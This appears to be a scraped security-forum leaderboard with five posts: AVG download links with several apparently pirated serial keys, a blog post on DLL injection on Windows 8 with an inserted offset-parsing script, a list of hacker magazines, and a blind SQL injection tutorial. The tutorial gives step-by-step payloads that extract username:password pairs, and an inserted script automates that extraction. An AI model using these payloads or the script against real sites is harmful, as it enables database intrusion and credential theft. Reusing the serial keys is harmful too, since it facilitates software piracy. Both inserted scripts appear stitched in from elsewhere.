
Leaderboard

Popular Content

Showing content with the highest reputation on 09/07/12 in all areas

  1. Download: AVG Internet Security 2013 32-bit Trial
     http://aa-download.avg.com/filedir/inst/avg_isct_x86_all_2013_2667a5738.exe
     Download: AVG Internet Security 2013 64-bit Trial
     http://aa-download.avg.com/filedir/inst/avg_isct_x64_all_2013_2667a5738.exe
     Serials:
     8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED
     8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED
     8MEH-RGM33-K474L-6FGRR-8QEFN-UEMBR-ACED
     64-bit:
     8MEH-R6BFE-HWUHF-DPNDA-VFUWX-2EMBR-ACED
     8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED
     8MEH-RFR8J-PTS8Q-92ATA-ORC6Q-JEMBR-ACED
     8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED
     Source: softexia.com
     edit// reuploaded! It works.
    1 point
  2. [h=2]DLL Injection and Windows 8[/h]
     By Nagareshwar Talekar on Sep 7 2012

     Recently, while working on a new version of RemoteDLL, I discovered interesting changes around DLL injection on Windows 8. Before I talk about the new changes, here is a little background story.

     CreateRemoteThread is the most common method used for DLL injection. It used to work flawlessly up to Windows XP. However, since Vista it changed its colors; mainly, it could no longer inject a DLL across sessions. This was attributed to the new 'Session Separation' feature introduced in Vista. To beat that limitation, we discovered a new undocumented method, NTCreateThread, which could inject a DLL across session boundaries on Vista/Win7.

     Now, while testing RemoteDLL on Windows 8, I tried (halfheartedly) injecting a DLL into a process running in Session 0. And to my utter surprise it worked, just like magic in the old days. I tried again to make sure that I was not dreaming. So it looks like M$ has put things back in order.

     The question arises whether the CreateRemoteThread change in Vista was done intentionally or accidentally, because we could still use NTCreateThread with little risk. A quick analysis points us in the other direction. CreateRemoteThread actually calls NTCreateThread somewhere down the layers. Maybe some extra checking code that was added in Vista actually caused CreateRemoteThread to exit. So it is possible that this extra code was for something else but adversely blocked injection across sessions. Now Microsoft may have realized the problem and fixed it to work normally. On the other hand, CreateRemoteThread has legitimate uses, and certainly some of its big customers may have made noise.

     To conclude, CreateRemoteThread now works well in Windows 8 across sessions (tested with the consumer edition). However, we still have to rely on NTCreateThread on Vista/Win7 for injection beyond session boundaries.

     Another notable change that I have observed is w.r.t. the Reference Count or Load Count for DLLs. A few years back we wrote a research article, 'The covert way to find the Reference Count of DLL', explaining the hidden/undocumented Load Count field in the LDR_MODULE structure.

         typedef struct _LDR_MODULE {
             LIST_ENTRY     InLoadOrderModuleList;
             LIST_ENTRY     InMemoryOrderModuleList;
             LIST_ENTRY     InInitializationOrderModuleList;
             PVOID          BaseAddress;
             PVOID          EntryPoint;
             ULONG          SizeOfImage;
             UNICODE_STRING FullDllName;
             UNICODE_STRING BaseDllName;
             ULONG          Flags;
             USHORT         LoadCount;
             USHORT         TlsIndex;
             LIST_ENTRY     HashTableEntry;
             ULONG          TimeDateStamp;
         } LDR_MODULE, *PLDR_MODULE;

     The PEB within each process stores information on all loaded DLLs in a linked list. Each DLL in this list is represented by an LDR_MODULE structure. One of the important but undocumented fields here is 'LoadCount' (the reference count of the DLL). This 'Load Count' plays an important role in deciding when the DLL has to be completely unloaded from the process. It is also useful for removing an injected DLL from a running process. Even our tools, RemoteDLL and SpyDLLRemover, use it while removing malware DLLs from a process.

     Here is the screenshot of RemoteDLL showing the Load Count for all DLLs in the selected process. As you see, the LoadCount for static DLLs is set to -1 as usual, but for dynamically loaded DLLs it is set to 6. So where the hell has it gone? It has to be somewhere, as every process needs it. It is possible that the LDR_MODULE structure has changed, or some of its fields have been altered, or it has moved somewhere else altogether. We have to dig further. This is just the tip of the iceberg; more reversing will reveal the real truth. As I discover more, I will put it here. Meanwhile, if you find anything interesting around it, do share!

     Source: DLL Injection and Windows 8 | SecurityXploded Blog
    1 point
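The post above relies on knowing where LoadCount sits inside each LDR_MODULE entry, and that position differs between 32-bit and 64-bit processes. The script below is an added example, not code from the post or from SecurityXploded's RemoteDLL/SpyDLLRemover: it derives the field offsets from the struct exactly as the post lists it, using the natural-alignment rules MSVC applies (which is what puts LoadCount at 0x38 on x86 and 0x6C on x64, the pre-Windows-8 layout the post is comparing against), and reads the field out of entry bytes that are constructed here rather than taken from a live PEB, so it runs on any host. The helper names `layout`, `read_field`, `load_count` and `make_entry` are this example's own.

```python
"""Locate and read the undocumented LoadCount field of an LDR_MODULE entry
for 32-bit and 64-bit processes.

Added example, not the post's or RemoteDLL's code.  Offsets are computed
from the struct in the post with natural alignment; the entry bytes are
constructed, not dumped from a process."""
import struct

SIZES = {"H": 2, "I": 4, "Q": 8}        # USHORT, ULONG, 64-bit pointer


def _align(off, a):
    return (off + a - 1) // a * a


def layout(ptr_size):
    """Offsets of every LDR_MODULE field for the given pointer size.

    Returns ({field: (offset, member_fmt)}, struct_size).  LIST_ENTRY is
    two pointers; UNICODE_STRING is USHORT Length, USHORT MaximumLength,
    PWSTR Buffer.  A field is aligned to its largest member and its members
    are aligned naturally inside it, which is what places FullDllName at
    0x48 rather than 0x44 on x64."""
    p = "Q" if ptr_size == 8 else "I"
    fields = [
        ("InLoadOrderModuleList", p + p),
        ("InMemoryOrderModuleList", p + p),
        ("InInitializationOrderModuleList", p + p),
        ("BaseAddress", p),
        ("EntryPoint", p),
        ("SizeOfImage", "I"),
        ("FullDllName", "HH" + p),
        ("BaseDllName", "HH" + p),
        ("Flags", "I"),
        ("LoadCount", "H"),
        ("TlsIndex", "H"),
        ("HashTableEntry", p + p),
        ("TimeDateStamp", "I"),
    ]
    offsets, off, max_align = {}, 0, 1
    for name, fmt in fields:
        align = max(SIZES[c] for c in fmt)
        max_align = max(max_align, align)
        off = _align(off, align)
        offsets[name] = (off, fmt)
        inner = 0                                   # size of the field itself
        for c in fmt:
            inner = _align(inner, SIZES[c]) + SIZES[c]
        off += _align(inner, align)
    return offsets, _align(off, max_align)          # struct is padded to its alignment


def read_field(entry, ptr_size, name):
    """Read one field from raw entry bytes; returns a tuple of its members."""
    off, fmt = layout(ptr_size)[0][name]
    values = []
    for c in fmt:
        off = _align(off, SIZES[c])
        values.append(struct.unpack_from("<" + c, entry, off)[0])
        off += SIZES[c]
    return tuple(values)


def load_count(entry, ptr_size):
    """LoadCount as the loader keeps it: 0xFFFF is the -1 the post shows for
    statically linked DLLs (never unloaded); anything else is the number of
    outstanding LoadLibrary references."""
    (count,) = read_field(entry, ptr_size, "LoadCount")
    return -1 if count == 0xFFFF else count


def make_entry(ptr_size, count, base=0x7FF00000):
    """Constructed LDR_MODULE bytes for this example (not a real dump)."""
    offsets, size = layout(ptr_size)
    buf = bytearray(size)
    p = "Q" if ptr_size == 8 else "I"
    struct.pack_into("<" + p, buf, offsets["BaseAddress"][0], base)
    struct.pack_into("<H", buf, offsets["LoadCount"][0], count & 0xFFFF)
    return bytes(buf)


if __name__ == "__main__":
    for bits, psz in ((32, 4), (64, 8)):
        offs, size = layout(psz)
        print(f"x{bits}: LoadCount at 0x{offs['LoadCount'][0]:X}, entry size 0x{size:X}")
    print(load_count(make_entry(4, -1), 4))   # static import: -1
    print(load_count(make_entry(8, 1), 8))    # one LoadLibrary reference: 1
```

On a live Windows process the same offsets apply to the entries reached from PEB->Ldr->InLoadOrderModuleList; the 0xFFFF sentinel is why tools like the one in the post display -1 for DLLs that came in through the import table.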
  3. The Hacker News Magazine
     site : The Hacker News Magazine - IT Security Magazine

     ClubHACK Magazine
     site : ClubHACK Magazine
     download : All Issues | ClubHACK Magazine

     Phrack
     site : .:: Phrack Magazine ::.
     download : Index of /archives

     Datenschleuder
     site : Die Datenschleuder
     download : Die Datenschleuder :: Download

     PenTest Magazine
     site : Penetration testing magazine – information security solutions [paid]
     download : RESOURCES • CYBER GATES Information Security Consulting, Testing and Research Company

     ][akep [Rus]
     site : Хакер

     2600: The Hacker Quarterly
     site : 2600 | General Information [paid]

     Hakin9
     site : IT Security Magazine - Hakin9 www.hakin9.org [paid]

     HITB Quarterly Magazine
     site : HITB Quarterly Magazine
     download : HITB Quarterly Magazine

     (IN)SECURE Magazine
     download : (IN)SECURE Magazine

     Hacktivism: The Hacker News Magazine - May 2012 Issue
     Welcome cyber space readers and internet junkies from around the world. May brings us an in-depth look at our favorite topic: Hacktivism.
     download : http://news.thehackernews.com/THN-May2012.pdf
     Our fearless leader, Mohit Kumar, founder of The Hacker News, opens the discussion with a look at the meaning of Hacktivism and what it means for society today. Our regular writers, security specialist Pierluigi Paganini and Mourad Ben Lakhousa, bring us their perspectives on this most interesting and thought-provoking topic. As editor, I truly enjoyed Keith H. DeBus's article on cyber war. I found myself wrapped up in excitement and worry as he takes us into the whats and wheres of cyber war. Also, Dominque C Brack does an excellent job discussing the topic. Your executive editor, Patti Galle, brings you to question just what Anonymous needs to look like in the future, and don't miss our fun pokes at current news. Thanks for your faithful readership and thanks to those who contribute in so many, many ways!
     Mohit Kumar, Editor-in-chief, The Hacker News

     Hack This Zine
     site : https://hackbloc.org/zine
     download : HackThisSite Mirror | HackThisZine

     You have things to read :) Posted for RST; if it is not posted in the right place, I ask the admins to move it. It deserves a like!
    1 point
  4. A new concept. or
    1 point
  5. Blind SQL Injection
     .Slacker, 30 August 2012

     Let's take as an example:
     http://www.site.com/news.php?id=5
     http://www.site.com/news.php?id=5 and 1=1 <= where 1=1 is true
     http://www.site.com/news.php?id=5 and 1=2 <= where 1=2 is false

     1. MySQL
     For blind injection we will use substring.
     http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
     Replace 4 with 5 if the query is true.
     http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

     2. Subselect
     When that does not work we will use a subselect.
     http://www.site.com/news.php?id=5 and (select 1)=1
     Now we will see whether we have access to mysql.user:
     http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
     If the page loads normally, we have access to mysql.user.

     3. Checking table and column names
     http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
     (With limit 0,1 the query returns one row of data because of the subselect.) If the page loads normally, with no content missing, the table exists. If we get FALSE (an article is missing), we just change the table name until we guess it. Let's say the table with users is named users. Now we need the column name.
     http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
     If the page loads normally, it means the column name is password. We have a password column.

     4. Extracting data from the database
     Once we have found the users table and the columns, password and username, we will extract the characters one by one.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
     We convert character 1 to its ASCII value (ASCII()). We will try to reach FALSE.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
     We got TRUE and must keep incrementing.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
     TRUE again.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
     Now we have FALSE. The first character of USERNAME is char(99). Converting from ASCII: char(99) is written 'c'.
     Let's check the second character:
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
     We changed ,1,1 to ,2,1 to get the second character.
     Now we go back to character 1:
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
     The page should load normally, so it is TRUE.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
     It is false, and we lower the number:
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
     It is true, and we raise the number:
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
     False. So the second character is char(105), which is 'i', and we have 'ci'. We keep incrementing this way until the end; when >0 returns false (FALSE) we know we have reached the end.
     I hope this tutorial helped.
    -1 points
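The four steps of the post above, carried through as one runnable script. This is an added example, not code from the post: the post's target (http://www.site.com/news.php?id=5 on MySQL) is stood in for by an in-memory SQLite database behind a deliberately vulnerable query, so the true/false oracle really executes the injected SQL, and the users row is constructed. Two dialect swaps from the post's MySQL payloads are assumed: SQLite spells ascii() as unicode(), and concat(username,0x3a,password) as username || char(58) || password. Character extraction uses a binary search over the code point instead of the post's hand-stepped >80, >95, >98, >99 walk. The names page_loads, truthy, table_exists, column_exists, char_at and extract are this example's own.

```python
"""Boolean-based blind SQL injection, end to end, against a local oracle.

Added example, not the post's code.  The vulnerable endpoint and the
sample data below are constructed so the script runs offline."""
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT);
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO news  VALUES (5, 'an article');
    INSERT INTO users VALUES (1, 'ci', 'secret');   -- constructed sample row
""")
requests = {"count": 0}          # how many pages the attacker had to fetch


def page_loads(id_param: str) -> bool:
    """The vulnerable endpoint: the id parameter is pasted straight into the
    query (the bug the post exploits).  True means the article rendered;
    False means an empty page or a database error (e.g. no such table)."""
    requests["count"] += 1
    sql = "SELECT title FROM news WHERE id=" + id_param
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def truthy(condition: str) -> bool:
    """Ask the oracle one yes/no question: id=5 and <condition>."""
    return page_loads("5 and " + condition)


def table_exists(table: str) -> bool:
    """Step 3 of the post: a subselect from a missing table errors out."""
    return truthy(f"(select 1 from {table} limit 0,1)=1")


def column_exists(table: str, column: str) -> bool:
    """Step 3: the '1' prefix makes the comparison independent of the
    column's value, so only a missing column (an error) yields False."""
    return truthy(f"(select substr('1' || {column},1,1) from {table} limit 0,1)='1'")


def char_at(query: str, pos: int) -> int:
    """Step 4 with a binary search: 7 requests per character for ASCII.
    Returns the code point, or 0 once pos runs past the end of the value
    (substr gives '' there, unicode('') is NULL, so every '>' is false)."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if truthy(f"unicode(substr(({query}),{pos},1))>{mid}"):
            lo = mid + 1          # the character is above mid
        else:
            hi = mid              # at or below mid (or end of string)
    return lo


def extract(query: str, max_len: int = 64) -> str:
    """Pull the first value of `query` character by character, like the
    post's username:password walk, stopping at the end-of-string signal."""
    out = []
    for pos in range(1, max_len + 1):
        code = char_at(query, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    print(truthy("1=1"), truthy("1=2"))
    print(table_exists("users"), table_exists("members"))
    print(column_exists("users", "password"), column_exists("users", "passwd"))
    before = requests["count"]
    leaked = extract("select username || char(58) || password from users limit 0,1")
    print(leaked, "in", requests["count"] - before, "requests")
```

Against a real MySQL target the only changes are the payload spellings (ascii() for unicode(), concat(username,0x3a,password) for the || form) and replacing page_loads with an HTTP request whose "article present" check matches the page; the request counter shows why the binary search matters when every question is a round trip.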
This leaderboard is set to Bucharest/GMT+02:00